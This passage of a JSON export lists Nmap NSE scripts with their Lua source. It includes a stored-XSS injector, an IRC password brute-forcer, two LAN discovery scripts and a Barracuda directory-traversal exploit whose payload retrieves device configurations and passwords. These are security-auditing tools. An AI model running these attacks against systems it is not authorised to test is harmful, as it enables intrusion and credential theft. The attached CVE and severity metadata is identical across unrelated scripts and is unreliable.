\": \")\n for i, content in pairs(postdata) do\n stdnse.debug2(i .. \": \" .. content)\n end\n local response = http.post(host, port, submission, { no_cache = true }, nil, postdata)\n end\n\nend\n\nlocal checkPayload = function(body, p)\n\n if (body:match(p)) then\n return true\n end\n\nend\n\n-- Check if the payloads were successful by checking the content of pages in the uploadspaths array.\nlocal checkRequests = function(body, target)\n\n local output = {}\n for _, p in ipairs(payloads) do\n if checkPayload(body, p.vector) then\n local report = \" Payload: \" .. p.vector .. \"\\n\\t Uploaded on: \" .. target\n if p.description then\n report = report .. \"\\n\\t Description: \" .. p.description\n end\n table.insert(output, report)\n end\n end\n return output\nend\n\nlocal readFromFile = function(filename)\n local database = { }\n for l in io.lines(filename) do\n table.insert(payloads, { vector = l })\n end\nend\n\naction = function(host, port)\n\n local formpaths = stdnse.get_script_args(\"http-stored-xss.formpaths\")\n local uploadspaths = stdnse.get_script_args(\"http-stored-xss.uploadspaths\")\n local fieldvalues = stdnse.get_script_args(\"http-stored-xss.fieldvalues\") or {}\n local dbfile = stdnse.get_script_args(\"http-stored-xss.dbfile\")\n\n if dbfile then\n readFromFile(dbfile)\n end\n\n local returntable = {}\n local result\n\n local crawler = httpspider.Crawler:new( host, port, '/', { scriptname = SCRIPT_NAME, no_cache = true } )\n\n if (not(crawler)) then\n return\n end\n\n crawler:set_timeout(10000)\n\n local index, k, target, response\n\n -- Phase 1. Crawls through the website and POSTs malicious payloads.\n while (true) do\n\n if formpaths then\n\n k, target = next(formpaths, index)\n if (k == nil) then\n break\n end\n response = http.get(host, port, target, { no_cache = true })\n target = host.name .. 
target\n else\n\n local status, r = crawler:crawl()\n -- if the crawler fails it can be due to a number of different reasons\n -- most of them are \"legitimate\" and should not be reason to abort\n if ( not(status) ) then\n if ( r.err ) then\n return stdnse.format_output(false, r.reason)\n else\n break\n end\n end\n\n target = tostring(r.url)\n response = r.response\n\n end\n\n if response.body then\n\n local forms = http.grab_forms(response.body)\n\n for i, form in ipairs(forms) do\n\n form = http.parse_form(form)\n\n if form and form.action then\n\n local action_absolute = string.find(form[\"action\"], \"https*://\")\n\n -- Determine the path where the form needs to be submitted.\n local submission\n if action_absolute then\n submission = form[\"action\"]\n else\n local path_cropped = string.match(target, \"(.*/).*\")\n path_cropped = path_cropped and path_cropped or \"\"\n submission = path_cropped..form[\"action\"]\n end\n\n makeRequests(host, port, submission, form[\"fields\"], fieldvalues)\n\n end\n end\n end\n if (index) then\n index = index + 1\n else\n index = 1\n end\n\n end\n\n local crawler = httpspider.Crawler:new( host, port, '/', { scriptname = SCRIPT_NAME } )\n local index\n\n -- Phase 2. 
Crawls through the website and searches for the special crafted strings that were POSTed before.\n while true do\n if uploadspaths then\n k, target = next(uploadspaths, index)\n if (k == nil) then\n break\n end\n response = http.get(host, port, target)\n else\n\n local status, r = crawler:crawl()\n -- if the crawler fails it can be due to a number of different reasons\n -- most of them are \"legitimate\" and should not be reason to abort\n if ( not(status) ) then\n if ( r.err ) then\n return stdnse.format_output(false, r.reason)\n else\n break\n end\n end\n\n target = tostring(r.url)\n response = r.response\n\n end\n\n if response.body then\n\n result = checkRequests(response.body, target)\n\n if next(result) then\n table.insert(returntable, result)\n end\n end\n if (index) then\n index = index + 1\n else\n index = 1\n end\n end\n\n if next(returntable) then\n table.insert(returntable, 1, \"Found the following stored XSS vulnerabilities: \")\n return returntable\n else\n return \"Couldn't find any stored XSS vulnerabilities.\"\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:41:30", "description": "Performs brute force password auditing against IRC (Internet Relay Chat) servers.\n\n## Script Arguments \n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. \n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n#### brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass \n\nSee the documentation for the [brute](<../lib/brute.html#script-args>) library. 
\n\n## Example Usage \n \n \n nmap --script irc-brute -p 6667 <ip>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 6667/tcp open irc\n | irc-brute:\n | Accounts\n | password - Valid credentials\n | Statistics\n |_ Performed 1927 guesses in 36 seconds, average tps: 74\n \n\n## Requires \n\n * [brute](<../lib/brute.html>)\n * [comm](<../lib/comm.html>)\n * [creds](<../lib/creds.html>)\n * [match](<../lib/match.html>)\n * [irc](<../lib/irc.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [rand](<../lib/rand.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-10-26T21:55:35", "type": "nmap", "title": "irc-brute NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-08T17:07:06", "id": "NMAP:IRC-BRUTE.NSE", "href": "https://nmap.org/nsedoc/scripts/irc-brute.html", "sourceData": "local brute = require \"brute\"\nlocal comm = require \"comm\"\nlocal creds = require \"creds\"\nlocal match = require \"match\"\nlocal irc = require \"irc\"\nlocal stdnse = require \"stdnse\"\nlocal rand = require \"rand\"\n\ndescription=[[\nPerforms brute force 
password auditing against IRC (Internet Relay Chat) servers.\n]]\n\n---\n-- @usage\n-- nmap --script irc-brute -p 6667 <ip>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 6667/tcp open irc\n-- | irc-brute:\n-- | Accounts\n-- | password - Valid credentials\n-- | Statistics\n-- |_ Performed 1927 guesses in 36 seconds, average tps: 74\n--\n\n--\n-- Version 0.1\n-- Created 26/10/2011 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n--\n\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories={\"brute\",\"intrusive\"}\n\nportrule = irc.portrule\n\nDriver = {\n\n new = function(self, host, port, opts)\n local o = { host = host, port = port, opts = opts or {} }\n setmetatable(o, self)\n self.__index = self\n return o\n end,\n\n connect = function(self)\n -- the high timeout should take delays from ident into consideration\n local s, r, opts, _ = comm.tryssl(self.host,\n self.port,\n '',\n { timeout = self.opts.timeout or 10000 } )\n if ( not(s) ) then\n return false, \"Failed to connect to server\"\n end\n self.socket = s\n return true\n end,\n\n login = function(self, _, password)\n local msg = (\"PASS %s\\r\\nNICK nmap_brute\\r\\nUSER anonymous 0 * :Nmap brute\\r\\n\"):format(password)\n local status, data = self.socket:send(msg)\n local success = false\n\n if ( not(status) ) then\n local err = brute.Error:new( data )\n -- This might be temporary, set the retry flag\n err:setRetry( true )\n return false, err\n end\n\n repeat\n local status, response = self.socket:receive_buf(match.pattern_limit(\"\\r?\\n\", 2048), false)\n -- we check for the RPL_WELCOME message, if we don't see it,\n -- we failed to authenticate\n if ( status and response:match(\"^:.-%s(%d*)%s\") == \"001\" ) then\n success = true\n end\n until(not(status))\n\n if (success) then\n return true, creds.Account:new(\"\", password, creds.State.VALID)\n end\n return false, brute.Error:new(\"Incorrect password\")\n end,\n\n disconnect = 
function(self) return self.socket:close() end,\n}\n\nlocal function needsPassword(host, port)\n local msg = (\"NICK %s\\r\\nUSER anonymous 0 * :Nmap brute\\r\\n\"):format(rand.random_alpha(9))\n local s, r, opts, _ = comm.tryssl(host, port, msg, { timeout = 15000 } )\n local err, code\n\n repeat\n local status, response = s:receive_buf(match.pattern_limit(\"\\r?\\n\", 2048), false)\n if ( status ) then\n code = tonumber(response:match(\"^:.-%s(%d*)%s\"))\n -- break after first code\n if (code == 001 ) then\n err = \"The IRC service does not require authentication\"\n break\n elseif( code ) then\n break\n end\n end\n until(not(status))\n if (code == 464) then\n return true\n end\n if ( code ) then\n return false, (\"Failed to check password requirements, unknown code (%d)\"):format(code)\n else\n return false, \"Failed to check password requirements\"\n end\nend\n\n\naction = function(host, port)\n\n local status, err = needsPassword(host, port)\n if ( not(status) ) then\n return stdnse.format_output(false, err)\n end\n\n local engine = brute.Engine:new(Driver, host, port)\n engine.options.script_name = SCRIPT_NAME\n engine.options.firstonly = true\n engine.options.passonly = true\n local result\n status, result = engine:start()\n\n return result\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:37", "description": "Discovers servers running the X Display Manager Control Protocol (XDMCP) by sending a XDMCP broadcast request to the LAN. 
Display managers allowing access are marked using the keyword Willing in the result.\n\n## Script Arguments \n\n#### broadcast-xdmcp-discover.timeout \n\nsocket timeout (default: 5s)\n\n## Example Usage \n \n \n nmap --script broadcast-xdmcp-discover\n \n\n## Script Output \n \n \n Pre-scan script results:\n | broadcast-xdmcp-discover:\n |_ 192.168.2.162 - Willing\n \n\n## Requires \n\n * [os](<>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n * [xdmcp](<../lib/xdmcp.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-01-26T19:35:19", "type": "nmap", "title": "broadcast-xdmcp-discover NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:BROADCAST-XDMCP-DISCOVER.NSE", "href": "https://nmap.org/nsedoc/scripts/broadcast-xdmcp-discover.html", "sourceData": "local os = require \"os\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\nlocal xdmcp = require \"xdmcp\"\n\ndescription = [[\nDiscovers servers running the X Display Manager Control Protocol (XDMCP) by\nsending a XDMCP broadcast 
request to the LAN. Display managers allowing access\nare marked using the keyword Willing in the result.\n]]\n\n---\n-- @usage\n-- nmap --script broadcast-xdmcp-discover\n--\n-- @output\n-- Pre-scan script results:\n-- | broadcast-xdmcp-discover:\n-- |_ 192.168.2.162 - Willing\n--\n-- @args broadcast-xdmcp-discover.timeout socket timeout (default: 5s)\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"broadcast\", \"safe\"}\n\n\nprerule = function() return true end\n\nlocal arg_timeout = stdnse.parse_timespec(stdnse.get_script_args(SCRIPT_NAME .. \".timeout\"))\n\naction = function()\n\n local host, port = { ip = \"255.255.255.255\" }, { number = 177, protocol = \"udp\" }\n local options = { timeout = 1 }\n local helper = xdmcp.Helper:new(host, port, options)\n local status = helper:connect()\n\n local req = xdmcp.Packet[xdmcp.OpCode.BCAST_QUERY]:new(nil)\n local status, err = helper:send(req)\n if ( not(status) ) then\n return false, err\n end\n\n local timeout = arg_timeout or 5\n local start = os.time()\n local result = {}\n repeat\n\n local status, response = helper:recv()\n if ( not(status) and response ~= \"TIMEOUT\" ) then\n break\n elseif ( status ) then\n local status, _, _, rhost = helper.socket:get_info()\n if ( response.header.opcode == xdmcp.OpCode.WILLING ) then\n result[rhost] = true\n else\n result[rhost] = false\n end\n end\n\n until( os.time() - start > timeout )\n\n local output = {}\n for ip, res in pairs(result) do\n if ( res ) then\n table.insert(output, (\"%s - Willing\"):format(ip))\n else\n table.insert(output, (\"%s - Unwilling\"):format(ip))\n end\n end\n return stdnse.format_output(true, output)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:48", "description": "Discovers hosts and routing information from devices running RIPng on the LAN by sending a broadcast RIPng Request command and collecting any 
responses.\n\n## Script Arguments \n\n#### broadcast-ripng-discover.timeout \n\nsets the connection timeout (default: 5s)\n\n## Example Usage \n \n \n nmap --script broadcast-ripng-discover\n \n\n## Script Output \n \n \n | broadcast-ripng-discover:\n | fe80::a00:27ff:fe9a:880c\n | route metric next hop\n | fe80:470:0:0:0:0:0:0/64 1\n | fe80:471:0:0:0:0:0:0/64 1\n |_ fe80:472:0:0:0:0:0:0/64 1\n \n\n## Requires \n\n * [ipOps](<../lib/ipOps.html>)\n * [nmap](<../lib/nmap.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [tab](<../lib/tab.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-01-14T18:44:07", "type": "nmap", "title": "broadcast-ripng-discover NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-08T17:07:00", "id": "NMAP:BROADCAST-RIPNG-DISCOVER.NSE", "href": "https://nmap.org/nsedoc/scripts/broadcast-ripng-discover.html", "sourceData": "local ipOps = require \"ipOps\"\nlocal nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal tab = require 
\"tab\"\nlocal table = require \"table\"\n\ndescription = [[\nDiscovers hosts and routing information from devices running RIPng on the\nLAN by sending a broadcast RIPng Request command and collecting any responses.\n]]\n\n---\n-- @usage\n-- nmap --script broadcast-ripng-discover\n--\n-- @output\n-- | broadcast-ripng-discover:\n-- | fe80::a00:27ff:fe9a:880c\n-- | route metric next hop\n-- | fe80:470:0:0:0:0:0:0/64 1\n-- | fe80:471:0:0:0:0:0:0/64 1\n-- |_ fe80:472:0:0:0:0:0:0/64 1\n--\n-- @args broadcast-ripng-discover.timeout sets the connection timeout\n-- (default: 5s)\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"broadcast\", \"safe\"}\n\n\nprerule = function() return ( nmap.address_family() == \"inet6\" ) end\n\nRIPng = {\n\n -- Supported RIPng commands\n Command = {\n Request = 1,\n Response = 2,\n },\n\n -- Route table entry\n RTE = {\n\n -- Creates a new Route Table Entry\n -- @param prefix string containing the ipv6 route prefix\n -- @param tag number containing the route tag\n -- @param prefix_len number containing the length in bits of the\n -- significant part of the prefix\n -- @param metric number containing the current metric for the\n -- destination\n new = function(self, prefix, tag, prefix_len, metric)\n local o = {\n prefix = prefix,\n tag = tag,\n prefix_len = prefix_len,\n metric = metric\n }\n setmetatable(o, self)\n self.__index = self\n return o\n end,\n\n -- Parses a byte string and creates an instance of RTE\n -- @param data string of bytes\n -- @return rte instance of RTE\n parse = function(data)\n local rte = RIPng.RTE:new()\n local pos, ip\n\n ip, rte.tag, rte.prefix_len, rte.metric, pos = string.unpack(\">c16 I2 BB\", data)\n rte.prefix = ipOps.str_to_ip(ip, 'inet6')\n return rte\n end,\n\n -- Converts a RTE instance to string\n -- @return string of bytes to send to the server\n __tostring = function(self)\n local ipstr = ipOps.ip_to_str(self.prefix)\n assert(16 == 
#ipstr, \"Invalid IPv6 address encountered\")\n return ipstr .. string.pack(\">I2 BB\", self.tag, self.prefix_len, self.metric)\n end,\n\n\n },\n\n -- The Request class contains functions to build a RIPv2 Request\n Request = {\n\n -- Creates a new Request instance\n --\n -- @param command number containing the RIPv2 Command to use\n -- @return o instance of request\n new = function(self, entries)\n local o = {\n command = 1,\n version = 1,\n entries = entries,\n }\n setmetatable(o, self)\n self.__index = self\n return o\n end,\n\n -- Converts the whole request to a string\n __tostring = function(self)\n local RESERVED = 0\n local str = {string.pack(\">BB I2\", self.command, self.version, RESERVED)}\n for _, rte in ipairs(self.entries) do\n str[#str+1] = tostring(rte)\n end\n return table.concat(str)\n end,\n\n },\n\n -- A RIPng Response\n Response = {\n\n -- Creates a new Response instance\n -- @return o new instance of Response\n new = function(self)\n local o = { }\n setmetatable(o, self)\n self.__index = self\n return o\n end,\n\n -- Creates a new Response instance based on a string of bytes\n -- @return resp new instance of Response\n parse = function(data)\n local resp = RIPng.Response:new()\n local pos, _\n\n resp.command, resp.version, _, pos = string.unpack(\">BB I2\", data)\n resp.entries = {}\n while( pos < #data ) do\n local e = RIPng.RTE.parse(data:sub(pos))\n table.insert(resp.entries, e)\n pos = pos + 20\n end\n\n return resp\n end,\n }\n}\n\nlocal function fail(err) return stdnse.format_output(false, err) end\n\n-- Parses a RIPng response\n-- @return ret string containing the routing table\nlocal function parse_response(resp)\n local next_hop\n local result = tab.new(3)\n tab.addrow(result, \"route\", \"metric\", \"next hop\")\n for _, rte in pairs(resp.entries or {}) do\n -- next hop information is specified in a separate RTE according to\n -- RFC 2080 section 2.1.1\n if ( 0xFF == rte.metric ) then\n next_hop = rte.prefix\n else\n tab.addrow(result, 
(\"%s/%d\"):format(rte.prefix, rte.prefix_len), rte.metric, next_hop or \"\")\n end\n end\n return tab.dump(result)\nend\n\naction = function()\n\n local req = RIPng.Request:new( { RIPng.RTE:new(\"0::\", 0, 0, 16) } )\n local host, port = \"FF02::9\", { number = 521, protocol = \"udp\" }\n local iface = nmap.get_interface()\n local timeout = stdnse.parse_timespec(stdnse.get_script_args(SCRIPT_NAME..\".timeout\"))\n timeout = (timeout or 5) * 1000\n\n local sock = nmap.new_socket(\"udp\")\n sock:bind(nil, 521)\n sock:set_timeout(timeout)\n\n local status = sock:sendto(host, port, tostring(req))\n\n -- do we need to add the interface name to the address?\n if ( not(status) ) then\n if ( not(iface) ) then\n return fail(\"Couldn't determine what interface to use, try supplying it with -e\")\n end\n status = sock:sendto(host .. \"%\" .. iface, port, tostring(req))\n end\n\n if ( not(status) ) then\n return fail(\"Failed to send request to server\")\n end\n\n local responses = {}\n while(true) do\n local status, data = sock:receive()\n if ( not(status) ) then\n break\n else\n local status, _, _, rhost = sock:get_info()\n if ( not(status) ) then\n rhost = \"unknown\"\n end\n responses[rhost] = RIPng.Response.parse(data)\n end\n end\n\n local result = {}\n for ip, resp in pairs(responses) do\n stdnse.debug1(ip, resp)\n table.insert(result, { name = ip, parse_response(resp) } )\n end\n return stdnse.format_output(true, result)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:44:54", "description": "Attempts to retrieve the configuration settings from a Barracuda Networks Spam & Virus Firewall device using the directory traversal vulnerability described at <http://seclists.org/fulldisclosure/2010/Oct/119>. \n\nThis vulnerability is in the \"locale\" parameter of \"/cgi-mod/view_help.cgi\" or \"/cgi-bin/view_help.cgi\", allowing the information to be retrieved from a MySQL database dump. 
The web administration interface runs on port 8000 by default. \n\nBarracuda Networks Spam & Virus Firewall <= 4.1.1.021 Remote Configuration Retrieval. Original exploit by ShadowHatesYou <Shadow@SquatThis.net>. For more information, see: <http://seclists.org/fulldisclosure/2010/Oct/119> and <http://www.exploit-db.com/exploits/15130/>\n\n## Script Arguments \n\n#### http-max-cache-size \n\nSet max cache size. The default value is 100,000. Barracuda config files vary in size mostly due to the number of users. Using a max cache size of 5,000,000 bytes should be enough for config files containing up to 5,000 users.\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. 
\n\n## Example Usage \n \n \n nmap --script http-barracuda-dir-traversal --script-args http-max-cache-size=5000000 -p <port> <host>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 8000/tcp open http syn-ack Barracuda Spam firewall http config\n | http-barracuda-dir-traversal:\n | Users: 256\n | Device: Barracuda Spam Firewall\n | Version: 4.1.0.0\n | Hostname: barracuda\n | Domain: example.com\n | Timezone: America/Chicago\n | Language: en_US\n | Password: 123456\n | API Password: 123456\n | MTA SASL LDAP Password: 123456\n | Gateway: 192.168.1.1\n | Primary DNS: 192.168.1.2\n | Secondary DNS: 192.168.1.3\n | DNS Cache: No\n | Backup Server: ftp.example.com\n | Backup Port: 21\n | Backup Type: ftp\n | Backup Username: user\n | Backup Password: 123456\n | NTP Enabled: Yes\n | NTP Server: update01.barracudanetworks.com\n | SSH Enabled: Yes\n | BRTS Enabled: No\n | BRTS Server: fp.bl.barracudanetworks.com\n | HTTP Port: 8000\n | HTTP Disabled: No\n | HTTPS Port: 443\n | HTTPS Only: No\n |\n | Vulnerable to directory traversal vulnerability:\n |_http://seclists.org/fulldisclosure/2010/Oct/119\n \n\n## Requires \n\n * [http](<../lib/http.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-06-28T23:43:34", "type": "nmap", "title": "http-barracuda-dir-traversal NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, 
"cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:HTTP-BARRACUDA-DIR-TRAVERSAL.NSE", "href": "https://nmap.org/nsedoc/scripts/http-barracuda-dir-traversal.html", "sourceData": "local http = require \"http\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nAttempts to retrieve the configuration settings from a Barracuda\nNetworks Spam & Virus Firewall device using the directory traversal\nvulnerability described at\nhttp://seclists.org/fulldisclosure/2010/Oct/119.\n\nThis vulnerability is in the \"locale\" parameter of\n\"/cgi-mod/view_help.cgi\" or \"/cgi-bin/view_help.cgi\", allowing the\ninformation to be retrieved from a MySQL database dump. The web\nadministration interface runs on port 8000 by default.\n\nBarracuda Networks Spam & Virus Firewall <= 4.1.1.021 Remote Configuration Retrieval\nOriginal exploit by ShadowHatesYou <Shadow@SquatThis.net>\nFor more information, see:\nhttp://seclists.org/fulldisclosure/2010/Oct/119\nhttp://www.exploit-db.com/exploits/15130/\n]]\n\n---\n-- @usage\n-- nmap --script http-barracuda-dir-traversal --script-args http-max-cache-size=5000000 -p <port> <host>\n--\n-- @args http-max-cache-size\n-- Set max cache size. The default value is 100,000.\n-- Barracuda config files vary in size mostly due to the number\n-- of users. 
Using a max cache size of 5,000,000 bytes should be\n-- enough for config files containing up to 5,000 users.\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 8000/tcp open http syn-ack Barracuda Spam firewall http config\n-- | http-barracuda-dir-traversal:\n-- | Users: 256\n-- | Device: Barracuda Spam Firewall\n-- | Version: 4.1.0.0\n-- | Hostname: barracuda\n-- | Domain: example.com\n-- | Timezone: America/Chicago\n-- | Language: en_US\n-- | Password: 123456\n-- | API Password: 123456\n-- | MTA SASL LDAP Password: 123456\n-- | Gateway: 192.168.1.1\n-- | Primary DNS: 192.168.1.2\n-- | Secondary DNS: 192.168.1.3\n-- | DNS Cache: No\n-- | Backup Server: ftp.example.com\n-- | Backup Port: 21\n-- | Backup Type: ftp\n-- | Backup Username: user\n-- | Backup Password: 123456\n-- | NTP Enabled: Yes\n-- | NTP Server: update01.barracudanetworks.com\n-- | SSH Enabled: Yes\n-- | BRTS Enabled: No\n-- | BRTS Server: fp.bl.barracudanetworks.com\n-- | HTTP Port: 8000\n-- | HTTP Disabled: No\n-- | HTTPS Port: 443\n-- | HTTPS Only: No\n-- |\n-- | Vulnerable to directory traversal vulnerability:\n-- |_http://seclists.org/fulldisclosure/2010/Oct/119\n--\n-- @changelog\n-- 2011-06-08 - created by Brendan Coles - itsecuritysolutions.org\n-- 2011-06-10 - added user count\n-- - looped path detection\n-- 2011-06-15 - looped system info extraction\n-- - changed service portrule to \"barracuda\"\n--\n\nauthor = \"Brendan Coles\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\", \"exploit\", \"auth\"}\n\n\nportrule = shortport.port_or_service (8000, \"barracuda\", {\"tcp\"})\n\naction = function(host, port)\n\n local result = {}\n local paths = {\"/cgi-bin/view_help.cgi\", \"/cgi-mod/view_help.cgi\"}\n local payload = \"?locale=/../../../../../../../mail/snapshot/config.snapshot%00\"\n local user_count = 0\n local config_file = \"\"\n\n -- Loop through vulnerable files\n stdnse.debug1(\"Connecting to %s:%s\", host.targetname or host.ip, 
port.number)\n for _, path in ipairs(paths) do\n\n -- Retrieve file\n local data = http.get(host, port, tostring(path))\n if data and data.status then\n\n -- Check if file exists\n stdnse.debug1(\"HTTP %s: %s\", data.status, tostring(path))\n if tostring(data.status):match(\"200\") then\n\n -- Attempt config file retrieval with LFI exploit\n stdnse.debug1(\"Exploiting: %s\", tostring(path .. payload))\n data = http.get(host, port, tostring(path .. payload))\n if data and data.status and tostring(data.status):match(\"200\") and data.body and data.body ~= \"\" then\n\n -- Check if the HTTP response contains a valid config file in MySQL database dump format\n if string.match(data.body, \"DROP TABLE IF EXISTS config;\") and string.match(data.body, \"barracuda%.css\") then\n config_file = data.body\n break\n end\n\n else\n stdnse.debug1(\"Failed to retrieve file: %s\", tostring(path .. payload))\n end\n\n end\n\n else\n stdnse.debug1(\"Failed to retrieve file: %s\", tostring(path))\n end\n\n end\n\n -- No config file found\n if config_file == \"\" then\n stdnse.debug1(\"%s:%s is not vulnerable or connection timed out.\", host.targetname or host.ip, port.number)\n return\n end\n\n -- Extract system info from config file in MySQL dump format\n stdnse.debug1(\"Exploit success! 
